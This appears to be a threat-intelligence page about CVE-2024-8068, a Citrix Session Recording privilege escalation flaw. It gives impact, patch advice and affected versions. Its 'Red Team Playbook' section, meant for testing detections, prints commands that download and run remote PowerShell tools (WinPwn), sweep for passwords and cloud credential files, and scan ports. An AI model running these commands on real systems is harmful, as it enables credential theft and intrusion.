CVE-2024-8068
Overview
This vulnerability is a privilege escalation flaw in Citrix Session Recording that arises from improper access control enforcement. The root cause lies in the insufficient restriction of authenticated users within the same Windows Active Directory domain, allowing them to elevate privileges to the NetworkService account. The affected component is the session recording server's access control mechanism within the Citrix Session Recording product.
Vulnerability Description
Privilege escalation to NetworkService Account access in Citrix Session Recording when an attacker is an authenticated user in the same Windows Active Directory domain as the session recording server domain
Impact
An attacker with a valid user account in the same Active Directory domain can escalate privileges to the NetworkService account on the session recording server. This elevated access enables lateral movement, unauthorized access to sensitive session recordings, and potential manipulation of recorded data. The prerequisite is possession of a low-privileged authenticated domain user account. The consequence includes compromise of session recording integrity and potential exposure of sensitive user session data within enterprise environments.
Solution
Citrix recommends applying the security updates detailed in the advisory CTX691941 available at https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069. The fix is included in Citrix Session Recording version 1912 cumulative update 3 (cu3) and later. Administrators should upgrade affected installations to these patched versions to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Citrix Session Recording allows for privilege escalation to NetworkService Account access when an attacker is an authenticated user within the same Windows Active Directory domain as the session recording server. This flaw arises from improper access controls that fail to adequately segregate user privileges, enabling an authenticated user to elevate their permissions and gain access to sensitive system resources. The NetworkService Account, which has elevated privileges, can be exploited to perform unauthorized actions, potentially compromising the integrity and confidentiality of the recorded sessions and the underlying system.
Attack vectors for this vulnerability are particularly concerning due to the requirement for the attacker to be an authenticated user within the same domain. This scenario is common in enterprise environments where users often have legitimate access to various systems. An attacker could leverage social engineering techniques or exploit weak passwords to gain initial access. Once authenticated, the attacker could execute specially crafted requests or commands that exploit the privilege escalation flaw, allowing them to assume the NetworkService Account's privileges. This could lead to further exploitation, including accessing sensitive data, modifying system configurations, or deploying malware within the network.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Citrix Session Recording for compliance and monitoring purposes. The ability to escalate privileges to that of the NetworkService Account could lead to unauthorized access to critical data, including recorded sessions that may contain sensitive information. This breach of confidentiality could result in regulatory penalties, loss of customer trust, and reputational damage. Additionally, the potential for lateral movement within the network increases the risk of a broader compromise, making this vulnerability a serious concern for businesses.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular audits of user access rights and permissions can help identify and remediate any excessive privileges. Employing robust authentication mechanisms, such as multi-factor authentication, can significantly reduce the risk of unauthorized access. Additionally, monitoring and logging user activities can help detect anomalous behavior indicative of exploitation attempts. Organizations should also ensure that they are running the latest versions of Citrix Session Recording and apply any available patches promptly to address known vulnerabilities.
In conclusion, the privilege escalation vulnerability in Citrix Session Recording poses a substantial risk to organizations operating within a Windows Active Directory environment. The potential for an authenticated user to gain elevated privileges underscores the importance of stringent access controls and proactive security measures. By implementing comprehensive detection and mitigation strategies, organizations can better protect their systems and sensitive data from exploitation, thereby reducing the overall risk associated with this vulnerability.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-8068, with telemetry indicating a doubling in detection frequency over recent monitoring periods. Although no new exploit techniques or ransomware affiliations have been identified, this surge signals increased adversary interest and potential preparatory actions within environments running Citrix Session Recording. The heightened detection trend underscores the vulnerability’s attractiveness as a vector for privilege escalation in Windows Active Directory domains, amplifying the risk of lateral movement and unauthorized access. Consequently, the threat level associated with this vulnerability should be considered elevated, reflecting a growing likelihood of exploitation attempts that could impact organizational security postures if left unaddressed.
Update 2 — August 22, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-8068, highlighted by a notable surge in exploitation attempts and the emergence of a new public proof-of-concept exploit on GitHub. This development expands the exploit landscape, lowering the barrier for adversaries to leverage this privilege escalation vulnerability within Windows Active Directory domains hosting Citrix Session Recording. Although the EPSS score shows a slight decline, the increase in exploitation tools and detection frequency signals growing attacker interest and operational capability. For defenders, this means the vulnerability is becoming more accessible and actively targeted, increasing the likelihood of successful privilege escalation and lateral movement within affected environments. Consequently, the threat level should be reassessed as elevated, reflecting a heightened risk profile driven by both increased adversary engagement and the availability of exploit resources.
Affected Products (18)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Session Recording | All |
cpe:2.3:a:citrix:session_recording:*:*:*:*:-:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:-:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu1:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu2:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu3:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu4:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu5:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu6:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu7:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 1912 |
cpe:2.3:a:citrix:session_recording:1912:cu8:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2203 |
cpe:2.3:a:citrix:session_recording:2203:-:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2203 |
cpe:2.3:a:citrix:session_recording:2203:cu1:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2203 |
cpe:2.3:a:citrix:session_recording:2203:cu2:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2203 |
cpe:2.3:a:citrix:session_recording:2203:cu3:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2203 |
cpe:2.3:a:citrix:session_recording:2203:cu4:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2203 |
cpe:2.3:a:citrix:session_recording:2203:cu5:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2402 |
cpe:2.3:a:citrix:session_recording:2402:-:*:*:ltsr:*:*:*
|
|
|
Citrix | Session Recording | 2407 |
cpe:2.3:a:citrix:session_recording:2407:-:*:*:-:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2024-8068-CVE-2024-8069
CVE-2024-8068, CVE-2024-8069
|
HORKimhab | 0 | 0 | 2026-08-19 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-8068 |
| support.citrix.com |
GitHub CVE
|
https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-8068 |